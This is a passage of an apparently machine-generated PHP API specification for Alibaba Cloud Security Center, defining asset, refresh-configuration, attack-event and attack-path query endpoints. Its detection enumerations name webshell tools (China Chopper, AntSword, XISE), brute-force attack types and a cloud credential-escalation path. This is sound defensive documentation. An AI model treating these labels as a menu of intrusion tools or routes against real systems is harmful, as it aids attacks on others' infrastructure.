assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'An extended parameter. This parameter is temporarily unavailable.'."\n", 'example' => 'test', 'required' => false, 'type' => 'string', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the servers that you want to query.'."\n", 'items' => ['description' => 'The UUID of the server that you want to query.'."\n", 'example' => 'fe914136-47ff-4dc3-bd25-fdd24969****', 'required' => false, 'type' => 'string', 'title' => ''], 'maxItems' => 1000, 'required' => true, 'type' => 'array', 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'example' => '3956048F-9D73-5EDB-834B-4827BB483977', 'type' => 'string', 'title' => ''], 'AssetList' => [ 'description' => 'The servers.'."\n", 'items' => [ 'description' => 'The information about the server.'."\n", 'properties' => [ 'Uuid' => ['description' => 'The UUID of the asset.'."\n", 'example' => '2a98f149-0256-414c-a29a-a69f8a75****', 'type' => 'string', 'title' => ''], 'LastUpgradeTime' => ['description' => 'The time when the Security Center agent was last upgraded.'."\n", 'example' => '1724522400000', 'format' => 'int64', 'type' => 'integer', 'title' => ''], 'CurVersion' => ['description' => 'The version of the Security Center agent.'."\n", 'example' => '0.0.8', 'type' => 'string', 'title' => ''], 'UpgradeEnable' => ['description' => 'Indicates whether automatic upgrade is enabled. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'example' => 'true', 'type' => 'boolean', 'title' => ''], 'Status' => ['description' => 'The publish status of the Security Center agent. Valid values:'."\n" ."\n" .'* **0**: not started.'."\n" .'* **1**: publishing.'."\n" .'* **2**: published.'."\n" .'* **3**: publish suspended.'."\n" .'* **4**: forcibly upgrading.'."\n", 'example' => '2', 'format' => 'int32', 'type' => 'integer', 'title' => ''], ], 'type' => 'object', 'title' => '', 'example' => '', ], 'type' => 'array', 'title' => '', 'example' => '', ], ], 'type' => 'object', 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB483977\\",\\n \\"AssetList\\": [\\n {\\n \\"Uuid\\": \\"2a98f149-0256-414c-a29a-a69f8a75****\\",\\n \\"LastUpgradeTime\\": 1724522400000,\\n \\"CurVersion\\": \\"0.0.8\\",\\n \\"UpgradeEnable\\": true,\\n \\"Status\\": 2\\n }\\n ]\\n}","type":"json"}]', 'title' => 'ListAssetInfoPublish', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAssetInfoPublish'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAssetInfoPublish', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListAssetRefreshTaskConfig' => [ 'summary' => 'Retrieves the asset refresh configuration.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The region of the Security Center instance.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'RefreshConfigType', 'in' => 'query', 'schema' => ['description' => 'The configuration type. Valid values:'."\n" .'- **0**: host refresh task'."\n" .'- **1**: cloud service refresh task'."\n" .'- **2**: AccessKey scheduled verification task.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], [ 'name' => 'TargetId', 'in' => 'query', 'schema' => ['description' => 'The ID of the AccessKey record specified when querying an AccessKey scheduled verification task.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2295', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'AssetRefreshConfig' => [ 'description' => 'The asset refresh configuration.', 'type' => 'array', 'items' => [ 'description' => 'The asset refresh configuration.', 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The cloud asset vendor. Valid values:'."\n" ."\n" .'- **3**: Tencent Cloud'."\n" .'- **4**: Huawei Cloud'."\n" .'- **7**: Amazon Web Services.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'SchedulePeriod' => ['description' => 'The synchronization period. Valid values:'."\n" ."\n" .'- **60**: 60 minutes'."\n" .'- **180**: 3 hours'."\n" .'- **360**: 6 hours'."\n" .'- **720**: 12 hours'."\n" .'- **1440**: 1 day'."\n" .'- **10080**: 7 days.', 'type' => 'integer', 'format' => 'int32', 'example' => '360', 'title' => ''], 'Status' => ['description' => 'The enabling status of the configuration. Valid values:'."\n" .'- **1**: enabled'."\n" .'- **0**: disabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RefreshConfigType' => ['description' => 'The configuration type. Valid values:'."\n" .'- **0**: host refresh task'."\n" .'- **1**: cloud service refresh task'."\n" .'- **2**: AccessKey scheduled verification task.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53C0DC1F8', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Get asset refresh configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAssetRefreshTaskConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListAssetRefreshTaskConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"AssetRefreshConfig\\": [\\n {\\n \\"Vendor\\": 3,\\n \\"SchedulePeriod\\": 360,\\n \\"Status\\": 1,\\n \\"RefreshConfigType\\": 1\\n }\\n ],\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53C0DC1F8\\"\\n}","type":"json"}]', ], 'ListAssetSelectionSelectedTarget' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'SelectionKey', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the asset selection.', 'type' => 'string', 'required' => true, 'example' => '2e6ab33d-4e00-4581-ac16-0dd1f9ad****', 'title' => ''], ], [ 'name' => 'TargetList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The query list.', 'type' => 'array', 'items' => ['description' => 'The asset ID. When selecting by machine, the value is the UUID of the machine. When selecting by group, the value is the group ID. When selecting by VPC, the value is the VPC ID.', 'type' => 'string', 'required' => false, 'example' => '1190****', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'minItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '1EB12F73-6828-59D2-9FBF-F3713FD55128', 'title' => ''], 'Data' => [ 'description' => 'The data details.', 'type' => 'array', 'items' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'TargetId' => ['description' => 'The asset ID. When selecting by machine, the value is the UUID of the machine. When selecting by group, the value is the group ID. When selecting by VPC, the value is the VPC ID.', 'type' => 'string', 'example' => '30****', 'title' => ''], 'TargetName' => ['description' => 'The asset name.', 'type' => 'string', 'example' => 'jen****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query selected assets from specified assets', 'summary' => 'Queries the selected assets from the specified assets.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAssetSelectionSelectedTarget'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAssetSelectionSelectedTarget', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1EB12F73-6828-59D2-9FBF-F3713FD55128\\",\\n \\"Data\\": [\\n {\\n \\"TargetId\\": \\"30****\\",\\n \\"TargetName\\": \\"jen****\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListAssetSelectionTarget' => [ 'summary' => 'Queries the required asset.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasGC725T'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Pages start from page 1. Default value: 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'SelectionKey', 'in' => 'query', 'schema' => ['description' => 'The globally unique identifier (GUID) of the asset.'."\n", 'type' => 'string', 'required' => true, 'example' => '8ccf9b01-2c64-4cba-8122-10115f29****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '50A75355-F58F-5D65-8377-98C88DED9C51', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '639', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'TargetId' => ['description' => 'The ID of the asset.'."\n", 'type' => 'string', 'example' => '30****', 'title' => ''], 'TargetName' => ['description' => 'The name of the asset.'."\n", 'type' => 'string', 'example' => 'test****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"50A75355-F58F-5D65-8377-98C88DED9C51\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 639\\n },\\n \\"Data\\": [\\n {\\n \\"TargetId\\": \\"30****\\",\\n \\"TargetName\\": \\"test****\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'ListAssetSelectionTarget', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAssetSelectionTarget'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAssetSelectionTarget', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AssetSelectionTargetAttachment', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:assetselectiontargetattachment/*'], ], ], ], ], ], 'ListAttackEventInfo' => [ 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '158251', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The timestamp of the end time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1753152532550'], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The timestamp of the start time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1752547732549'], ], [ 'name' => 'AttackInstance', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The attacked asset. You can specify the machine instance name, public IP address, or private IP address.', 'type' => 'string', 'required' => false, 'example' => 'instance_**'], ], [ 'name' => 'AttackType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The attack type. Valid values:'."\n" .'- 9: SQL Server brute-force attack'."\n" .'- 5: SSH brute-force attack'."\n" .'- 6: RDP brute-force attack'."\n" .'- 101: Java Struts2 attack interception'."\n" .'- 102: Redis attack interception'."\n" .'- 103: China Chopper (AntSword) WebShell communication'."\n" .'- 104: China Chopper (Caidao) WebShell communication'."\n" .'- 133: XISE WebShell communication'."\n" .'- 161: WebShell upload'."\n" .'- 209: PHP WebShell upload'."\n" .'- 210: JSP WebShell upload'."\n" .'- 211: ASP WebShell upload'."\n" .'- 215: WebShell upload with special suffix'."\n" .'- ai_webshell: intelligent WebShell upload defense'."\n" .'- java_common_rce: Java common RCE vulnerability interception'."\n" .'- alinet_webrce: adaptive web attack defense', 'type' => 'string', 'required' => false, 'example' => '9'], ], [ 'name' => 'SrcIp', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The source IP address of the attack.', 'type' => 'string', 'required' => false, 'example' => '185.237.96.***'], ], [ 'name' => 'DstPort', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The destination port of the attack.', 'type' => 'string', 'required' => false, 'example' => '9085'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English'."\n" ."\n\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to return in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of attack events.', 'type' => 'array', 'items' => [ 'description' => 'The attack event.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The attack status. Valid values:'."\n" .'- block: blocked (defended)', 'type' => 'string', 'example' => 'block', 'title' => ''], 'FirstTime' => ['description' => 'The time when the attack event first occurred, in timestamp format.', 'type' => 'integer', 'format' => 'int64', 'example' => '1752731615000', 'title' => ''], 'FirstTimeStr' => ['description' => 'The time when the attack event first occurred, in string format.', 'type' => 'string', 'example' => '2025-07-17 13:53:35', 'title' => ''], 'AttackType' => ['description' => 'The attack type. Valid values:'."\n" .'- 9: SQL Server brute-force attack'."\n" .'- 5: SSH brute-force attack'."\n" .'- 6: RDP brute-force attack'."\n" .'- 101: Java Struts2 attack interception'."\n" .'- 102: Redis attack interception'."\n" .'- 103: China Chopper (AntSword) WebShell communication'."\n" .'- 104: China Chopper (Caidao) WebShell communication'."\n" .'- 133: XISE WebShell communication'."\n" .'- 161: WebShell upload'."\n" .'- 209: PHP WebShell upload'."\n" .'- 210: JSP WebShell upload'."\n" .'- 211: ASP WebShell upload'."\n" .'- 215: WebShell upload with special suffix'."\n" .'- ai_webshell: intelligent WebShell upload defense'."\n" .'- java_common_rce: Java common RCE vulnerability interception'."\n" .'- alinet_webrce: adaptive web attack defense'."\n" .'- other: Other', 'type' => 'string', 'example' => '9', 'title' => ''], 'DstPort' => ['description' => 'The destination port of the attack.', 'type' => 'string', 'example' => '8000', 'title' => ''], 'Count' => ['description' => 'The number of attacks.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'SrcIp' => ['description' => 'The source IP address of the attack.', 'type' => 'string', 'example' => '140.205.11.**', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the attacked asset.', 'type' => 'string', 'example' => '10.1.0.**', 'title' => ''], 'PayloadMd5' => ['description' => 'The MD5 hash of the attack payload.', 'type' => 'string', 'example' => 'a57b0d657369e4201eed8d47a4dc****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the attacked asset.', 'type' => 'string', 'example' => 'sql-test-0****', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the attacked asset instance.', 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the attacked asset.', 'type' => 'string', 'example' => '101.37.86.**', 'title' => ''], 'LatestTime' => ['description' => 'The most recent time when the attack event occurred.', 'type' => 'integer', 'format' => 'int64', 'example' => '1752731618000', 'title' => ''], 'LatestTimeStr' => ['description' => 'The most recent time when the attack event occurred, in string format.', 'type' => 'string', 'example' => '2025-07-17 13:53:38', 'title' => ''], 'Id' => ['description' => 'The ID of the attack event.', 'type' => 'string', 'example' => '18825544674********', 'title' => ''], 'AttackTypeName' => ['description' => 'The mapped name of the attack type. Valid values:'."\n" .'- 9: SQL Server brute-force attack'."\n" .'- 5: SSH brute-force attack'."\n" .'- 6: RDP brute-force attack'."\n" .'- 101: Java Struts2 attack interception'."\n" .'- 102: Redis attack interception'."\n" .'- 103: China Chopper (AntSword) WebShell communication'."\n" .'- 104: China Chopper (Caidao) WebShell communication'."\n" .'- 133: XISE WebShell communication'."\n" .'- 161: WebShell upload'."\n" .'- 209: PHP WebShell upload'."\n" .'- 210: JSP WebShell upload'."\n" .'- 211: ASP WebShell upload'."\n" .'- 215: WebShell upload with special suffix'."\n" .'- ai_webshell: intelligent WebShell upload defense'."\n" .'- java_common_rce: Java common RCE vulnerability interception'."\n" .'- alinet_webrce: adaptive web attack defense'."\n" .'- other: Other', 'type' => 'string', 'example' => 'SQL Server暴力破解', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries to return on each page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '253', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the API call is successful. Valid values:'."\n" .'- **true**: successful'."\n" .'- **false**: failed', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Other values indicate failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The return message of the request result.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier that Alibaba Cloud generates for the request. You can use this ID for troubleshooting.', 'type' => 'string', 'example' => '52870893-48A7-5A9E-9E05-6253E5B6****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code. A value of 200 indicates that the request is successful.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Retrieve the list of attack analysis events', 'summary' => 'Retrieve the list of attack analysis events', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListAttackEventInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"Status\\": \\"block\\",\\n \\"FirstTime\\": 1752731615000,\\n \\"FirstTimeStr\\": \\"2025-07-17 13:53:35\\",\\n \\"AttackType\\": \\"9\\",\\n \\"DstPort\\": \\"8000\\",\\n \\"Count\\": 2,\\n \\"SrcIp\\": \\"140.205.11.**\\",\\n \\"IntranetIp\\": \\"10.1.0.**\\",\\n \\"PayloadMd5\\": \\"a57b0d657369e4201eed8d47a4dc****\\",\\n \\"InstanceName\\": \\"sql-test-0****\\",\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"InternetIp\\": \\"101.37.86.**\\",\\n \\"LatestTime\\": 1752731618000,\\n \\"LatestTimeStr\\": \\"2025-07-17 13:53:38\\",\\n \\"Id\\": \\"18825544674********\\",\\n \\"AttackTypeName\\": \\"SQL Server暴力破解\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 253,\\n \\"Count\\": 3\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"52870893-48A7-5A9E-9E05-6253E5B6****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ListAttackPathEvent' => [ 'summary' => 'Queries the list of attack path events.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226489', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RiskLevelList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **remind**: reminder'."\n" .'- **suspicious**: suspicious'."\n" .'- **serious**: critical.', 'type' => 'string', 'required' => false, 'example' => 'remind', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'PathNameDesc', 'in' => 'query', 'schema' => ['description' => 'The path name description.'."\n" .'> Call [ListAvailableAttackPath](~~ListAvailableAttackPath~~) to query path name descriptions.', 'type' => 'string', 'required' => false, 'example' => 'ECS Instance Can Obtain Long-term Access Credential by Enabling Console Logon for RAM User', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start time as a timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1666886400000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end time as a timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1668064495000', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the results to return. Default value: 1, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'maximum' => '200', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'AttackPathAssetList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of cloud service assets in the attack path.', 'type' => 'array', 'items' => [ 'description' => 'The list of cloud service assets in the attack path.', 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The vendor of the cloud service asset.'."\n" .'> Call [ListSupportAttackPathAsset](~~ListSupportAttackPathAsset~~) to query the vendors of cloud service assets.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud service asset.'."\n" ."\n" .'> Call [ListSupportAttackPathAsset](~~ListSupportAttackPathAsset~~) to query the types of cloud service assets.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '17', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service asset.'."\n" ."\n" .'> Call [ListSupportAttackPathAsset](~~ListSupportAttackPathAsset~~) to query the subtypes of cloud service assets.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], 'NodeType' => ['description' => 'The node type. Valid values:'."\n" .'- **start**: start node.'."\n" .'- **end**: end node.', 'type' => 'string', 'required' => false, 'example' => 'start', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'PathType', 'in' => 'query', 'schema' => ['description' => 'The path type.'."\n" .'> Call [ListAvailableAttackPath](~~ListAvailableAttackPath~~) to query path types.', 'type' => 'string', 'required' => false, 'example' => 'role_escalation', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '3956048F-9D73-5EDB-834B-4827BB48****', 'title' => ''], 'AttackPathEventList' => [ 'description' => 'The list of attack path events.', 'type' => 'array', 'items' => [ 'description' => 'The attack path event.', 'type' => 'object', 'properties' => [ 'PathType' => ['description' => 'The path type.', 'type' => 'string', 'example' => 'role_escalation', 'title' => ''], 'PathName' => ['description' => 'The path name.', 'type' => 'string', 'example' => 'ecs_get_credential_by_create_login_profile', 'title' => ''], 'PathNameDesc' => ['description' => 'The path name description.', 'type' => 'string', 'example' => 'ECS Instance Can Obtain Long-term Access Credential by Enabling Console Logon for RAM User', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level.', 'type' => 'string', 'example' => 'suspicious', 'title' => ''], 'SrcAsset' => [ 'description' => 'The source asset.', 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'The ID of the cloud service asset instance.', 'type' => 'string', 'example' => 'i-bp18ifsr1tu1dx39****', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the cloud service asset instance.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 